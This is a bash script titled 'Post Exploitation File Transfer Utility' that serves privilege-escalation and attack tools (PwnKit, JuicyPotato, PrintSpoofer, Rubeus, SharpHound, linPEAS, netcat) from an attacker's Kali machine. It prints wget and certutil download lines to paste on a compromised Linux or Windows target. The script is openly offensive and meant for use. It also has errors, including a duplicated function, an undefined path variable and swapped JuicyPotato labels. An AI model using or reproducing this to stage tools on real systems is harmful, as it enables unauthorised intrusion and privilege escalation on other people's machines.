#!/bin/bash

###########################################
#---------------) Colors (----------------#
###########################################
##
# Color  Variables
##
green='\e[32m'
blue='\e[34m'
clear='\e[0m'

##
# Color Functions
##

ColorGreen(){
	echo -ne $green$1$clear
}
ColorBlue(){
	echo -ne $blue$1$clear
}

C=$(printf '\033')
RED="${C}[1;31m"
SED_RED="${C}[1;31m&${C}[0m"
GREEN="${C}[1;32m"
SED_GREEN="${C}[1;32m&${C}[0m"
YELLOW="${C}[1;33m"
SED_YELLOW="${C}[1;33m&${C}[0m"
SED_RED_YELLOW="${C}[1;31;103m&${C}[0m"
BLUE="${C}[1;34m"
SED_BLUE="${C}[1;34m&${C}[0m"
ITALIC_BLUE="${C}[1;34m${C}[3m"
LIGHT_MAGENTA="${C}[1;95m"
SED_LIGHT_MAGENTA="${C}[1;95m&${C}[0m"
LIGHT_CYAN="${C}[1;96m"
SED_LIGHT_CYAN="${C}[1;96m&${C}[0m"
LG="${C}[1;37m" #LightGray
SED_LG="${C}[1;37m&${C}[0m"
DG="${C}[1;90m" #DarkGray
SED_DG="${C}[1;90m&${C}[0m"
NC="${C}[0m"
UNDERLINED="${C}[5m"
ITALIC="${C}[3m"
###########################################
#---------------) Art (-------------------#
###########################################

echo -ne "${GREEN}
 | _______________ |
 | |XXXXXXXXXXXXX| |
 | |XXXXXXXXXXXXX| |
 | |XXXXXXXXXXXXX| |
 | |XXXXXXXXXXXXX| |
 | |XXXXXXXXXXXXX| |    Welcome to the Post Exploitation File Transfer Utility 
 |_________________|
    _[_______]_
 ___[___________]___
|         [_____] []|__
|         [_____] []|  \__
L___________________J     \ \___
 ___________________      	/\
   \n/###################\          (__)
 "  
   
                                                            
                                                                   
    
###########################################
#---------------) Variables (-------------#
###########################################
##------------Linux---------######

LINPEAS_PATH='/home/kali/PrivEsc/PEASS-ng/linPEAS/'
LINUX_EXPLOIT_SUGGESTER_PATH='/home/kali/PrivEsc/PEASS-ng/linPEAS/linux-exploit-suggester/'
SOCAT_PATH='/home/kali/staticbinaries/static-binaries/binaries/linux/x86_64/'
SUID3NUM='/home/kali/SUID3NUM/'
PWNKIT='/home/kali/ZenPhoto/PwnKit/'
SUDOKILLER='/home/kali/SUDO_KILLER/'

##----------Windows---------######

SHARPHOUND='/home/kali/WindowsTools/'
SEATBELT='/home/kali/WindowsTools/'
WINPEAS_PATH='/home/kali/WindowsTools/'
POWERSPLOIT='/home/kali/WindowsTools/'
RUBEUS='/home/kali/Ghostpack-CompiledBinaries/'
POWERVIEW='/home/kali/PowerSploit/Recon/'
SHERLOCK='/home/kali/WindowsTools/'

echo -ne "\n${BLUE}What is your IP? "
read ip

#######------------Functions-------#######

function linpeas_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}wget http://$ip:$port/linpeas.sh\n"
	cd $LINPEAS_PATH	
	python3 -m http.server $port 
}
function pwnkit64_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}wget http://$ip:$port/PwnKit\n"
	cd $PWNKIT	
	python3 -m http.server $port 
}

function suidenum_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}wget http://$ip:$port/suid3num.py\n"
	cd $SUID3NUM	
	python3 -m http.server $port 
}

function les_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}wget http://$ip:$port/linux-exploit-suggester.sh\n"
	cd $LINUX_EXPLOIT_SUGGESTER_PATH	
	python3 -m http.server $port 
}

function socat_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}wget http://$ip:$port/socat\n"
	cd $SOCAT_PATH	
	python3 -m http.server $port 
}
function winpeasx64_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/winPEASx64.exe winPEASx64.exe\n"
	cd $WINPEAS_PATH	
	python3 -m http.server $port 
}

function winpeasx86_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/winPEASx86.exe winPEASx86.exe\n"
	cd $WINPEAS_PATH	
	python3 -m http.server $port 
}

function Seatbelt_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/Seatbelt.exe Seatbelt.exe\n"
	cd $WINPEAS_PATH	
	python3 -m http.server $port 
}

function netcat_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/nc.exe nc.exe\n"
	cd $WINPEAS_PATH	
	python3 -m http.server $port 
}

function powerup_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
	echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/PowerUp.ps1 PowerUp.ps1\n"
	cd $POWERSPLOIT_PATH	
	python3 -m http.server $port 
}

function printspoofer_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/PrintSpoofer.exe PrintSpoofer.exe\n"
	cd $POWERSPLOIT_PATH	
	python3 -m http.server $port 
}

function juicypotatox86_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/JuicyPotato.exe JuicyPotato.exe\n"
	cd $POWERSPLOIT_PATH	
	python3 -m http.server $port 
}
function juicypotatox64_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/Juicy.Potato.x86.exe Juicy.Potato.x86.exe\n"
	cd $POWERSPLOIT_PATH	
	python3 -m http.server $port 
}

function sharphound_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/SharpHound.exe SharpHound.exe\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/SharpHound.ps1 SharpHound.ps1\n"
	echo -ne "Run:\n .\SharpHound.exe -c all\n"
	cd $SHARPHOUND	
	python3 -m http.server $port 
}
function rubeus_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/Rubeus.exe Rubeus.exe\n"
	cd $RUBEUS	
	python3 -m http.server $port 
}

function powerview_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/PowerView.ps1 PowerView.ps1\n"
	cd $POWERVIEW	
	python3 -m http.server $port 
}
function sherlock_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/Sherlock.ps1 Sherlock.ps1\n"
	cd $SHERLOCK	
	python3 -m http.server $port 
}
function sherlock_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}certutil -urlcache -f http://$ip:$port/Sherlock.ps1 Sherlock.ps1\n"
	cd $SHERLOCK	
	python3 -m http.server $port 
}
function sudokiller_server() {
	echo ""
	
	echo -ne "\n\nWhich Port would you like to host the server on?\n"
	echo -ne "Remember that you should always host a server on the machine's open ports\n"
	echo -ne "Port: "
	read port 
		echo -ne ""
	echo -ne "${GREEN}[*] Copy the following line [*]\n"
	echo -ne "${RED}wget http://$ip:$port/SUDO_KILLERv2.2.2.sh\n"
	cd $SUDOKILLER	
	python3 -m http.server $port 
}
function menu(){
echo -ne "${RED}
Choose Wisely
-------------------------------
$(ColorGreen '1)') Linpeas
$(ColorGreen '2)') Linux-Exploit-Suggester
$(ColorGreen '3)') Socat
$(ColorGreen '4)') SUID 3NUM
$(ColorGreen '5)') Winpeasx64
$(ColorGreen '6)') Winpeasx86
$(ColorGreen '7)') SeatBelt
$(ColorGreen '8)') Netcat
$(ColorGreen '9)') PowerUP
$(ColorGreen '10)') PrintSpoofer
$(ColorGreen '11)') JuicyPotatox64
$(ColorGreen '12)') JuicyPotatox84
$(ColorGreen '13)') Pwnkit
$(ColorGreen '14)') SharpHound
$(ColorGreen '15)') Rubeus
$(ColorGreen '16)') PowerView
$(ColorGreen '17)') Sherlock
$(ColorGreen '18)') Sudo Killer
$(ColorGreen '0)') Exit
$(ColorBlue 'Choose an option:') "
        read a
        case $a in
	        1) linpeas_server ; menu ;;
	        2) les_server ; menu ;;
	        3) socat_server ; menu ;;
	        4) suidenum_server ; menu ;;
	        5) winpeasx64_server ; menu ;;
	        6) winpeasx86_server ; menu ;;
	        7) Seatbelt_server ; menu ;;
	        8) netcat_server ; menu ;;
	        9) powerup_server ; menu ;;
	        10) printspoofer_server ; menu ;;
	        11) juicypotatox86_server ; menu ;;
	        12) juicypotatox64_server ; menu ;;
	        13) pwnkit64_server ; menu ;;
		14) sharphound_server ; menu ;;
		15) rubeus_server ; menu ;;
		16) powerview_server ; menu ;;
		17) sherlock_server ; menu ;;
		18) sudokiller_server ; menu ;;
			0) exit 0 ;;
			*) echo -e $red"Wrong option."$clear; WrongCommand;;
        esac
}

menu

